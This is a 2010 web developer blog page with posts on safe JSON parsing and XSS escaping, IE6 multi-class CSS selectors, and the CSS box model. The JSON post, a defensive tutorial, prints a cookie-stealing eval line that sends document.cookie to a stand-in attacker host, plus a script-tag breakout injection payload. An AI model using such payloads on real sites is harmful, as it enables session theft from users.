Saturday, September 18, 2010

JSON parsing, encoding, and security

JSON is a subset of JavaScript. Unlike other data formats such as XML, JSON can be used in JavaScript without big efforts. This is the main reason why JSON is widely beloved among web developers.

JSON string such as "{name: 'David'}" can be put into an eval function. eval function will call JavaScript interpreter and convert the string into a JSON object: {name: 'David'}.

var jsonStr = "{name: 'David'}";
var jsonObj = eval( "(" + jsonStr + ")" ); 
// jsonObj will be {name: 'David'}

This all looks easy. However, here comes the problem: eval function will execute whatever passed in. If jsonStr is "alert('Gotcha');", eval("alert('Gotcha');") will actually execute the alert call. This opens a wide door to cross-site scripting (XSS) attacks. For example, consider the following string passed in an eval function:

eval(
  '(new Image()).src = 
    "http://www.givemeyourcookie.com/steal_cookie?cookie=" + 
    escape(document.cookie);'
)

The above code will send your cookie to givemeyourcookie.com.

To fix this vulnerability, it is recommended to use a JSON parser to convert strings into JSON objects. A parser in some browsers which provide native JSON support can be even faster than the eval function.

Like the eval function, a JSON parser takes a string and outputs a JSON object. The difference is that the parser will process only when the passed-in string is a valid JSON string. For example, the JSON parser from YUI JavaScript library will throw a SyntaxError if the JSON string contains anything that violates JSON syntax.

var jsonStr = 'alert("Gotcha"); {"name" : "David"}';
var jsonObj = YAHOO.lang.JSON.parse(jsonStr); // SyntaxError

With a correct JSON string, the following code will run.

var jsonStr = '{"name" : "David"}';
var jsonObj = YAHOO.lang.JSON.parse(jsonStr);
alert(jsonObj.name); // Prompt "David"

Using JSON parser certainly solves the eval problem. However, this is only half of the story. We web developers usually use scripting language such as PHP or JSP to embed dynamic parts to a page. When we do that, we need to be careful about what we embed.

<script type="text/javascript">
  var jsonObj = 
    YAHOO.lang.JSON.parse('<s:property value="userProfile" />');
</script>

<s:property> is a tag from Struts 2 (a popular MVC framework in Java). What it does is getting a property, in this case a string representation of a userProfile, and embedding the property inside a pair of single quotes to construct a javascript string. The parse function then converts this string to a JSON object.

This will work fine if the userProfile property is a normal user profile:

<script type="text/javascript">
  // userProfile property is { "name": "David", "hobby": "Blogging" }. 
  var jsonObj = 
    YAHOO.lang.JSON.parse('{ "name": "David", "hobby": "Blogging" }');
</script>

However, code will break if the userProfile property is:

{ "name": "David", "hobby": "Blogging in Peet's Coffee" }

The single quote in "Blogging in Peet's Coffee" will prematurely terminate the string, which breaks the JavaScript syntax.

<script type="text/javascript">
  // { "name": "David", "hobby": "Blogging in Peet's Coffee" }. 
  var jsonObj = YAHOO.lang.JSON.parse(
    '{ "name": "David", "hobby": "Blogging in Peet' // Broken
    s Coffee" }');
</script>

Things could be even worse when userProfile is something like this:

{ "name": "David", "hobby": ""}');alert("Evil script goes here");</script>"}

Pass this property to the parse function, and you will get:

<script type="text/javascript">
  var jsonObj = YAHOO.lang.JSON.parse(
    '{ "name": "David", "hobby": ""}');alert("Evil script goes here");</script>"}');
</script>

This is equivalent to:

<script type="text/javascript">
  var jsonObj = YAHOO.lang.JSON.parse('{ "name": "David", "hobby": ""}');
  alert("Evil script goes here");
</script>
"}');
</script>

The above code will run despite the fact that the second </script> tag doesn't have a matched <script> tag. It's pretty scary that a raw JSON string could introduce such XSS attack to your web application, isn't it?

To fix the problem, we need to escape the single quote. We can use unicode \u0027 (equivalent to character ').

<script type="text/javascript">
  var jsonObj = YAHOO.lang.JSON.parse(
      '{ "name": "David", "hobby": "Blogging in Peet\u0027s Coffee" }');
</script>

In real world, all user inputs and database data need to be JavaScript-string escaped if they are directly embedded into JavaScript or event handler attributes (e.g. onclick). Single quote is just one of the characters that we need to escape. Here is a list of such characters and their escapes.

Character Escape Description
\\\Backslash
"\u0022Double quote
'\u0027Single quote
<\u003cLess than
>\u003eGreater than
=\u003dEquals
&\u0026Ampersand

I created a Java utility class to escape all these characters. The essential part looks like this:

// A map of characters and their escapes
private static Map<String, String> _mapChar2Escape = 
  new LinkedHashMap<String, String>();

static
{
  // Be sure to have backslash at first.  
  // We don't want to escape backslashes in escaped characters.
  _mapChar2Escape.put("\\", "\\\\");    // Backslash
  _mapChar2Escape.put("\"", "\\u0022"); // Double quote
  _mapChar2Escape.put("'", "\\u0027");  // Single quote
  _mapChar2Escape.put("&", "\\u0026");  // Ampersand
  _mapChar2Escape.put("<", "\\u003c");  // Less than
  _mapChar2Escape.put(">", "\\u003e");  // Greater than
  _mapChar2Escape.put("=", "\\u003d");  // Equals
}

/**
 * Returns a new string that has JavaScript literals escaped.
 * 
 * @param strSource Source string
 * @return
 */
public static String escapeJavaScript(String strSource)
{
  String strEscaped = strSource;

  for (Map.Entry<String, String> entry : _mapChar2Escape.entrySet())
  {
    strEscaped = strEscaped.replace(entry.getKey(), entry.getValue());
  }

  return strEscaped;
}

That's it.

Wednesday, September 1, 2010

IE6 multi class CSS selector weirdness

1. Problem


Multi class CSS selectors such as ".green.bold" (no space between) are commonly used in modern web styling. However, whenever you have something fun to play, IE6 comes to ruin it.

.bold { font-weight: bold; }
.green.bold { color: green; }
.blue.bold { color: blue; }

<p class="bold green">
    Green and bold
</p>
<p class="bold blue">
    Blue and bold
</p>

In other browsers such as FireFox, the above CSS and HTML will be rendered like this:

Green and bold

Blue and bold

Now, be prepared for IE6 weirdness:

Green and bold

Blue and bold

That is how IE6 renders the above CSS. Let's take a closer look. Both lines are bold. That's right. However, the first line should be green instead of blue.

Although I don't have an official answer for this behavior, I found a theory to explain how IE6 CSS parser works in this case. This is just my theory. I haven't verified it against any W3C documents.

2. Theory


The way that IE6 parses these ".green.bold" and ".blue.bold" CSS selectors can be explained like this:

When IE6 runs to multi class selectors, e.g. ".green.bold", IE6 will only recognize the last class which is "bold". The preceding classes such as "green" will be ignored.

.green.bold { ... }

The above CSS rule will be parsed as

.bold { ... }

Now let's re-examine the CSS rules at the beginning of this article.

.bold { font-weight: bold; }
.green.bold { color: green; }
.blue.bold { color: blue; }

For IE6, this will be equivalent to:

.bold { font-weight: bold; }
.bold { color: green; }
.bold { color: blue; }

Please notice the last 2 lines. ".bold { color: green; }" precedes ".bold { color: blue; }", so blue overwrites green. However, "font-weight: bold" in the first CSS rule doesn't get overwritten due to the fact that later CSS rules don't define any font weights.

The above CSS can be further simplified to:

.bold { font-weight: bold; color: blue; }

With the "parsed" CSS, now we understand why IE6 rendered our CSS and HTML into two blue bold lines.

To prove my theory, I change the CSS rules a bit:

.bold { font-weight: bold; }
.green.bold { color: green; font-size: 24px; }
.blue.bold { color: blue; }

".green.bold" has font size set to 24px. Let's try to walk through it like what IE6 CSS parser works.

Step 1:
.bold { font-weight: bold; }
.bold { color: green; font-size: 24px; }
.bold { color: blue; }

Step 2:
.bold { font-weight: bold; color: green; font-size: 24px; }
.bold { color: blue; }

Step 3:
.bold { font-weight: bold; color: blue; font-size: 24px; }

Try this in IE6, the result will be like this.

Green and bold

Blue and bold

3. Solution


How do we fix this IE6 weirdness?

Because IE6 honors only the last class in a multi class selector, we can move the more specific class to last. So here we swapped "green" and "bold":

.bold { font-weight: bold; }
.bold.green { color: green; font-size: 24px; }
.bold.blue { color: blue; }

For IE6, this will be parsed as:
.bold { font-weight: bold; }
.green { color: green; font-size: 24px; }
.blue { color: blue; }

Now the result became:

Green and bold

Blue and bold

However, in real world, things won't be this simple. For example, this solution won't work in the 3-class case, e.g. ".class1.class2.class3". The styles that class2 defines will be lost. unless you copy the styles from class2 to class3, and thus equivalently make it a 2-class selector: .class1.class3

HTML Box model, IE, and 100% width

A HTML box has margin, border, and padding surrounding its content area.  According to the W3C specification, 'width' and 'height' CSS attributes only define the width and height of the content area, not the box itself.  The box's padding, border, and margin are not considered to be parts of the content area.

So the following CSS rule will render a 150-pixel wide and heigh 'myBox' DIV, although its CSS width and height are set to 100 pixels:

#myBox {
    width: 100px;
    height: 100px;
    padding: 10px;
    border: 5px;
    margin: 10px;
}

box width = width + 2 * (padding + border + margin) = 100 + 2 * (10 + 5 + 10) = 150

However, IE decides to have its own box model. IE includes padding and border (not margin) in width and height. So the above CSS rule will produce a 120-pixel wide and heigh box.

box width = width + 2 * margin = 100 + 2 * 10 = 120

Because the CSS width (100px) already includes padding (10px) and border (5px), the box's content area will be squeezed from 100 pixels to 70 pixels.

content width = width - 2 * (padding + border) = 100 - 2 * (10 + 5) = 70

This weird behavior can be fixed by declaring a doc type.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

The above doc type will force IE to honor the W3C standard, and apply CSS width only to the content area.

The standard W3C box model will give you headaches if you are not careful. For example, we want a box to have a 100% width and 10-pixel padding.

#myBox {
    width: 100%;
    padding: 10px;
}

This CSS rule makes the width of "myBox" 100% of its ancestor container. Let's say myBox's parent container has a 400-pixel box width. Since the myBox's width is 100%, it will be 100% of its parent's 400px width, so you might think that the width will be 400 pixels. Is it true? What about the padding?

The actual width will be 400px plus 20px.

box width = 100% of parent's box width + 2 * padding = 100% * 400 + 2 * 10 = 420

420 might not be what you want because it will be wider than its parent. In real word, this issue might screw up your layout. To fix this problem, add an inner DIV inside myBox.

<div id="myBox">
    <div id="innerBox">
    </div>
</div>

And divide the above CSS rule to two:

#myBox {
    width: 100%;
}
#innerBox {
    padding: 10px;
    /* Or you can use margin */
}

This will make sure that the innerBox has 10px paddings and still fits in the 400px wide myBox.

The rule of thumb is not to mix percents with paddings or margins.

Further reading on the box model: The Box Model Problem